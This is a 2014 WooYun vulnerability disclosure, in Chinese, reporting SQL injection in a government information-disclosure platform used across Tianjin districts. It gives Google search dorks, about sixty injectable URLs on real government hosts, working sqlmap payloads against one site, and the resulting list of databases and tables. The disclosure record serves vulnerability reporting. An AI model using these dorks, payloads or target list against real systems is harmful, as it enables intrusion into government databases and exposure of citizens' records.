当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068793

漏洞标题:某直辖市专用政府信息公开平台多处SQL注射

相关厂商:cncert国家互联网应急中心

漏洞作者:

提交时间:2014-07-17 14:39

修复时间:2014-10-15 14:40

公开时间:2014-10-15 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-17: 细节已通知厂商并且等待厂商处理中
2014-07-22: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向第三方安全合作伙伴开放
2014-09-15: 细节向核心白帽子及相关领域专家公开
2014-09-25: 细节向普通白帽子公开
2014-10-05: 细节向实习白帽子公开
2014-10-15: 细节向公众公开

简要描述:

前面还有3个没审核,继续提交
求给力@

详细说明:

WooYun: 某通用型政府信息公开平台SQL注入漏洞
该信息公开平台主要涉及天津市,看了下还有其他注入,整理了一下。

google搜索:
#1 inurl:GZZDInfordetail.jsp?id
#2 inurl:FLGDInfordetail.jsp?id
#3 inurl:gkznInfo.jsp?depcode
#4 inurl:orgsiteInfo.jsp?orgid
#5 inurl:js_NDBGInfordetail.jsp?id


影响案例(空格区分注入点):

http://www.tjzfxxgk.gov.cn/tjep/GZZDInfordetail.jsp?id=43
http://info.tjjn.gov.cn/GZZDInfordetail.jsp?id=17
http://xinxigk.baodi.gov.cn/GZZDInfordetail.jsp?id=10
http://gk.tjjh.gov.cn/GZZDInfordetail.jsp?id=11
http://xxgk.tjbc.cn/GZZDInfordetail.jsp?id=5
http://www.tjnh.gov.cn:7002/GZZDInfordetail.jsp?id=7
http://202.99.99.30/GZZDInfordetail.jsp?id=10
http://gk.tjhqqzf.gov.cn/GZZDInfordetail.jsp?id=5
http://zfxxgk.bh.gov.cn/GZZDInfordetail.jsp?id=9
http://221.239.20.83/GZZDInfordetail.jsp?id=9
http://218.69.96.137/GZZDInfordetail.jsp?id=2
http://gk.tjheping.gov.cn:3030/GZZDInfordetail.jsp?id=14
http://www.tjzfxxgk.gov.cn/tjep/FLGDInfordetail.jsp?id=43
http://zwgk.tjhd.gov.cn:8000/FLGDInfordetail.jsp?id=11
http://info.tjjn.gov.cn/FLGDInfordetail.jsp?id=28
http://gk.tjjh.gov.cn/FLGDInfordetail.jsp?id=29
http://www.tjnh.gov.cn:7002/FLGDInfordetail.jsp?id=14
http://gk.tjhqqzf.gov.cn/FLGDInfordetail.jsp?id=5
http://202.99.99.30/FLGDInfordetail.jsp?id=11
http://zfxxgk.bh.gov.cn/FLGDInfordetail.jsp?id=10
http://221.239.20.83/FLGDInfordetail.jsp?id=2
http://zwgk.tjhexi.gov.cn:8080/FLGDInfordetail.jsp?id=1
http://gk.tjheping.gov.cn:3030/FLGDInfordetail.jsp?id=11
http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M
http://info.tjjn.gov.cn/gkznInfo.jsp?depcode=BOF04A
http://gk.tjnk.gov.cn/gkznInfo.jsp?depcode=BDA20B
http://xinxigk.baodi.gov.cn/gkznInfo.jsp?depcode=BNA05F
http://gk.tjjh.gov.cn/gkznInfo.jsp?depcode=BRA19G
http://gk.xq.gov.cn/gkznInfo.jsp?depcode=BJE01A
http://www.tjnh.gov.cn:7002/gkznInfo.jsp?depcode=BQA07K
http://xxgk.tjbc.cn/gkznInfo.jsp?depcode=BLA25I
http://zwgk.tjhexi.gov.cn:8080/gkznInfo.jsp?depcode=BCE01A
http://gk.tjhqqzf.gov.cn/gkznInfo.jsp?depcode=BFA02B
http://202.99.99.30/gkznInfo.jsp?depcode=CBA10E
http://60.28.129.212/gkznInfo.jsp?depcode=BE0000
http://61.181.146.98:7002/gkznInfo.jsp?depcode=BQA20L
http://218.69.106.201:8080/gkznInfo.jsp?depcode=BCA28A
http://221.239.20.83/gkznInfo.jsp?depcode=BKB23E
http://gk.tjwq.gov.cn/gkznInfo.jsp?depcode=BMF25A
http://218.69.96.137/gkznInfo.jsp?depcode=BMB04C
http://60.30.65.156/gkznInfo.jsp?depcode=BNB05L
http://gk.tjheping.gov.cn:3030/gkznInfo.jsp?depcode=BAE02A
http://www.tjzfxxgk.gov.cn/tjep/orgsiteInfo.jsp?orgid=91
http://xxgk.tjbc.cn/orgsiteInfo.jsp?orgid=102
http://info.tjjn.gov.cn/js_NDBGInfordetail.jsp?id=5
http://zwgk.tjhd.gov.cn:8000/js_NDBGInfordetail.jsp?id=4
http://gk.xq.gov.cn/js_NDBGInfordetail.jsp?id=2
http://xinxigk.baodi.gov.cn/js_NDBGInfordetail.jsp?id=7
http://gk.tjjh.gov.cn/js_NDBGInfordetail.jsp?id=6
http://www.tjzfxxgk.gov.cn/tjep/js_NDBGInfordetail.jsp?id=5
http://www.tjnh.gov.cn:7002/js_NDBGInfordetail.jsp?id=13
http://xxgk.tjbc.cn/js_NDBGInfordetail.jsp?id=8
http://gk.tjhqqzf.gov.cn/js_NDBGInfordetail.jsp?id=4
http://gk.tjnk.gov.cn/js_NDBGInfordetail.jsp?id=5
http://zwgk.tjhexi.gov.cn:8080/js_NDBGInfordetail.jsp?id=2
http://202.99.99.30/js_NDBGInfordetail.jsp?id=2
http://zfxxgk.bh.gov.cn/js_NDBGInfordetail.jsp?id=4
http://221.239.20.83/js_NDBGInfordetail.jsp?id=6


q1.jpg

q2.jpg

q3.jpg

q4.jpg


漏洞证明:

http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M

---
Place: GET
Parameter: depcode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depcode=BBA15M' AND 5496=5496 AND 'bqId'='bqId
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: depcode=-4714' UNION ALL SELECT NULL,CONCAT(0x71726f6d71,0x76476b67
5449646c7179,0x7172696f71)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: depcode=BBA15M' AND SLEEP(5) AND 'uxUa'='uxUa
---
[22:34:30] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.11


available databases [5]:
[*] gbase
[*] govinfo
[*] information_schema
[*] northwind
[*] system


Database: govinfo
[60 tables]
+-----------------------+
| all_info_tbl          |
| appeal                |
| apply_complaint_tbl   |
| apply_delay_tbl       |
| apply_fee_tbl         |
| apply_indictment_tbl  |
| apply_info_tbl        |
| apply_pj_tbl          |
| apply_reply_tbl       |
| apply_update_tbl      |
| applyuserview         |
| au_function_rel       |
| au_operator_info_tbl  |
| au_role_function_rel  |
| au_role_rel           |
| au_user_role_rel      |
| auapprolefunctionview |
| auoperatorroleview    |
| commission_tbl        |
| complaint             |
| con_info_clob_tbl     |
| con_info_reply_tbl    |
| con_info_tbl          |
| dbb_tbl               |
| departments           |
| dir_info_tbl          |
| djlql_tbl             |
| funs                  |
| get_way_tbl           |
| ggl_tbl               |
| gkzn_tbl              |
| info_sort_tbl         |
| link_tbl              |
| mapping               |
| messagerel            |
| ndgzbg_tbl            |
| operation_list_tbl    |
| org_info_tbl          |
| org_info_tbl_bak      |
| org_site_info_tbl     |
| org_user_info_tbl     |
| org_user_info_tbl_bak |
| para_application_rel  |
| para_depart_rank_rel  |
| para_depart_rel       |
| para_org_rel          |
| pdf_tbl               |
| plan_table            |
| rolefuns              |
| roles                 |
| roleusers             |
| rules_info_tbl        |
| sequence              |
| user_roles_funs       |
| users                 |
| visitcount            |
| window_apply_info_tbl |
| work_time_tbl         |
| zdsyh                 |
| zxwh_tbl              |
+-----------------------+

修复方案:

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-22 14:23

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-17 14:41 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    你的居然大厂商,我的省的系统才小厂商,不公平啊 @疯狗

  2. 2014-07-17 14:53 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    目测又在搞重庆了

  3. 2014-07-17 14:55 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    @疯狗、、我的2014-06-04的漏洞都没有审核、、求审核啊、5555555

  4. 2014-07-17 14:58 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @zhxs @袋鼠妈妈 @U神 坑爹啊 这个是我昨晚提交的,最早审核 10号的都还没审核

  5. 2014-07-17 15:07 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    目测又在搞重庆了

  6. 2014-07-17 15:08 | 低调的瘦子 ( 普通白帽子 | Rank:466 漏洞数:68 | loading……………………)

    @U神 手里揣着一个省级系统命令执行漏洞,目测发了也是小厂商

  7. 2014-07-17 15:09 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @魇 貌似都一样呢. 之前提交的也还没有审核...昨晚的今早就审核了.太棒了 @疯狗

  8. 2014-07-17 16:40 | feiyu ( 实习白帽子 | Rank:33 漏洞数:10 )

    为什么 我第一想到的就是重庆

  9. 2014-07-17 17:29 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @feiyu 好像其他不会用直辖市这个称呼,它们有更响亮滴名字,除了重庆

  10. 2014-07-17 18:23 | nextdoor ( 普通白帽子 | Rank:325 漏洞数:74 )

    一天刷四个通用,一个也不走大厂商说不过去

  11. 2014-07-17 22:01 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @nextdoor 无力了 连续过3个都是小厂商 都不知道在搞什么

  12. 2014-07-17 22:22 | nextdoor ( 普通白帽子 | Rank:325 漏洞数:74 )

    我的也都是小厂商

  13. 2014-07-22 11:48 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @cncert国家互联网应急中心 来确认吧

  14. 2014-07-22 14:29 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    天津的吧,不少有waf

  15. 2014-07-22 22:28 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    内裤还我